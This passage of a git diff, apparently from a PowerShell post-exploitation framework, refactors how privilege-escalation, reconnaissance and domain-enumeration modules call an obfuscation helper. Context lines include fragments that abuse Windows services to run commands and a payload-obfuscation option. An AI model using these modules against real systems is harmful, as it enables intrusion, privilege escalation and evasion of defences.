Module: else: scriptEnd += "\nInstall-ServiceBinary -ServiceName \""+str(serviceName)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py index f966dfe..2e2e1fe 100644 --- a/lib/modules/powershell/privesc/powerup/service_exe_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_exe_useradd.py @@ -106,6 +106,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_stager.py b/lib/modules/powershell/privesc/powerup/service_stager.py index 1585cfd..044fb8f 100644 --- a/lib/modules/powershell/privesc/powerup/service_stager.py +++ b/lib/modules/powershell/privesc/powerup/service_stager.py @@ -121,6 +121,6 @@ class Module: scriptEnd += "Invoke-ServiceAbuse -ServiceName \""+serviceName+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C `\"$env:Temp\\debug.bat`\"\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/service_useradd.py b/lib/modules/powershell/privesc/powerup/service_useradd.py index df9701b..3ed8c4e 100644 --- a/lib/modules/powershell/privesc/powerup/service_useradd.py +++ b/lib/modules/powershell/privesc/powerup/service_useradd.py @@ -104,6 +104,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py index e77e177..d123d4e 100644 --- a/lib/modules/powershell/privesc/powerup/write_dllhijacker.py +++ b/lib/modules/powershell/privesc/powerup/write_dllhijacker.py @@ -122,6 +122,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/privesc/tater.py b/lib/modules/powershell/privesc/tater.py index ff525c9..e46df21 100644 --- a/lib/modules/powershell/privesc/tater.py +++ b/lib/modules/powershell/privesc/tater.py @@ -155,6 +155,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/find_fruit.py b/lib/modules/powershell/recon/find_fruit.py index dbca367..65f0b7a 100644 --- a/lib/modules/powershell/recon/find_fruit.py +++ b/lib/modules/powershell/recon/find_fruit.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Format-Table -AutoSize | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py index 948c69a..943ed5b 100644 --- a/lib/modules/powershell/recon/get_sql_server_login_default_pw.py +++ b/lib/modules/powershell/recon/get_sql_server_login_default_pw.py @@ -102,6 +102,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script \ No newline at end of file diff --git a/lib/modules/powershell/recon/http_login.py b/lib/modules/powershell/recon/http_login.py index b74f5b1..2b39a7d 100644 --- a/lib/modules/powershell/recon/http_login.py +++ b/lib/modules/powershell/recon/http_login.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py index 3d58f84..db0f2c8 100644 --- a/lib/modules/powershell/situational_awareness/host/antivirusproduct.py +++ b/lib/modules/powershell/situational_awareness/host/antivirusproduct.py @@ -101,5 +101,5 @@ Get-AntiVirusProduct """ script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(self.info["Name"])+' completed!";' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/computerdetails.py b/lib/modules/powershell/situational_awareness/host/computerdetails.py index 1c51f85..808a3ef 100644 --- a/lib/modules/powershell/situational_awareness/host/computerdetails.py +++ b/lib/modules/powershell/situational_awareness/host/computerdetails.py @@ -107,7 +107,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4624 (Logon):`n";' scriptEnd += "Write-Output $Filtered4624.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "4648": @@ -115,7 +115,7 @@ class Module: scriptEnd += 'Write-Output "Event ID 4648 (Explicit Credential Logon):`n";' scriptEnd += "Write-Output $Filtered4648.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "AppLocker": @@ -123,7 +123,7 @@ class Module: scriptEnd += 'Write-Output "AppLocker Process Starts:`n";' scriptEnd += "Write-Output $AppLockerLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "PSLogs": @@ -131,7 +131,7 @@ class Module: scriptEnd += 'Write-Output "PowerShell Script Executions:`n";' scriptEnd += "Write-Output $PSLogs.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script if option == "SavedRDP": @@ -139,13 +139,13 @@ class Module: scriptEnd += 'Write-Output "RDP Client Data:`n";' scriptEnd += "Write-Output $RdpClientData.Values | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script # if we get to this point, no switched were specified scriptEnd += "Get-ComputerDetails -Limit " + str(self.options['Limit']['Value']) + " -ToString" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/dnsserver.py b/lib/modules/powershell/situational_awareness/host/dnsserver.py index acdcdae..8c9b0a2 100644 --- a/lib/modules/powershell/situational_awareness/host/dnsserver.py +++ b/lib/modules/powershell/situational_awareness/host/dnsserver.py @@ -101,5 +101,5 @@ function Get-SystemDNSServer else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py index 364d877..cb6feda 100644 --- a/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py +++ b/lib/modules/powershell/situational_awareness/host/findtrusteddocuments.py @@ -82,6 +82,6 @@ class Module: script = moduleCode scriptEnd = "Find-TrustedDocuments" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/get_pathacl.py b/lib/modules/powershell/situational_awareness/host/get_pathacl.py index 00ab99a..5511c2b 100644 --- a/lib/modules/powershell/situational_awareness/host/get_pathacl.py +++ b/lib/modules/powershell/situational_awareness/host/get_pathacl.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/get_proxy.py b/lib/modules/powershell/situational_awareness/host/get_proxy.py index 71eecb6..fe5997a 100644 --- a/lib/modules/powershell/situational_awareness/host/get_proxy.py +++ b/lib/modules/powershell/situational_awareness/host/get_proxy.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py index 1939a24..e749366 100644 --- a/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py +++ b/lib/modules/powershell/situational_awareness/host/monitortcpconnections.py @@ -116,6 +116,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/paranoia.py b/lib/modules/powershell/situational_awareness/host/paranoia.py index 253971e..4540894 100644 --- a/lib/modules/powershell/situational_awareness/host/paranoia.py +++ b/lib/modules/powershell/situational_awareness/host/paranoia.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/host/winenum.py b/lib/modules/powershell/situational_awareness/host/winenum.py index fd0583d..f8252c5 100644 --- a/lib/modules/powershell/situational_awareness/host/winenum.py +++ b/lib/modules/powershell/situational_awareness/host/winenum.py @@ -90,6 +90,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/arpscan.py b/lib/modules/powershell/situational_awareness/network/arpscan.py index 387b496..345372f 100644 --- a/lib/modules/powershell/situational_awareness/network/arpscan.py +++ b/lib/modules/powershell/situational_awareness/network/arpscan.py @@ -91,6 +91,6 @@ class Module: scriptEnd += " | Select-Object MAC, Address | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/bloodhound.py b/lib/modules/powershell/situational_awareness/network/bloodhound.py index d080099..7506a5a 100644 --- a/lib/modules/powershell/situational_awareness/network/bloodhound.py +++ b/lib/modules/powershell/situational_awareness/network/bloodhound.py @@ -159,7 +159,7 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py index 4563d5a..99163e9 100644 --- a/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py +++ b/lib/modules/powershell/situational_awareness/network/get_exploitable_system.py @@ -113,5 +113,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/get_spn.py b/lib/modules/powershell/situational_awareness/network/get_spn.py index 9fce9ca..b9c00f4 100644 --- a/lib/modules/powershell/situational_awareness/network/get_spn.py +++ b/lib/modules/powershell/situational_awareness/network/get_spn.py @@ -93,6 +93,6 @@ class Module: scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py index dbf5362..8996ab7 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_instance_domain.py @@ -118,6 +118,6 @@ class Module: if udpTimeOut != "": scriptEnd += " -UDPTimeOut "+udpTimeOut if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py index 83c9bf9..ca86149 100644 --- a/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py +++ b/lib/modules/powershell/situational_awareness/network/get_sql_server_info.py @@ -104,6 +104,6 @@ class Module: if instance != "" and not check_all: scriptEnd += " -Instance "+instance if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/portscan.py b/lib/modules/powershell/situational_awareness/network/portscan.py index 336e1bf..88f7617 100644 --- a/lib/modules/powershell/situational_awareness/network/portscan.py +++ b/lib/modules/powershell/situational_awareness/network/portscan.py @@ -142,6 +142,6 @@ class Module: scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py index 77f24df..4dcd3b2 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_computer_field.py @@ -103,5 +103,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py index 1e81f69..866fb8d 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_group.py @@ -97,5 +97,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py index 6d7588d..60a1ad1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_foreign_user.py @@ -97,5 +97,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py index ab9a194..fd02dd9 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_computer_admin.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py index 2ca9d6f..1d9179a 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_gpo_location.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py index 675c30c..5e8328b 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py @@ -118,5 +118,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py index 463840f..e39406c 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py @@ -85,5 +85,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py index 0a98d22..8f2dd50 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py @@ -103,5 +103,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py index 0168052..c32c615 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py index b521180..94d2fc1 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py @@ -132,5 +132,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py index f527abf..9440c57 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py @@ -92,5 +92,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py index d709597..fde07a3 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py index 4a6d5cf..0fd2bb6 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py @@ -119,5 +119,5 @@ class Module: else: script += moduleName + " " + pscript + ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed! Use ExpandObject option to expand one of the objects above such as \'System Access\'"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py index 4b7189f..c90d258 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py @@ -98,5 +98,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py index 49c34ae..0e49bdc4 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py @@ -92,5 +92,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py index 4ed84c1..5b713e5 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py index 7c55217..0a0592f 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py @@ -87,5 +87,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py index 28dd8ee..d4b2f82 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py @@ -112,5 +112,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py index 1932b95..52ba4bc 100644 --- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py +++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py @@ -109,5 +109,5 @@ class Module: script += '} | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py index f21e51f..6157e14 100644 --- 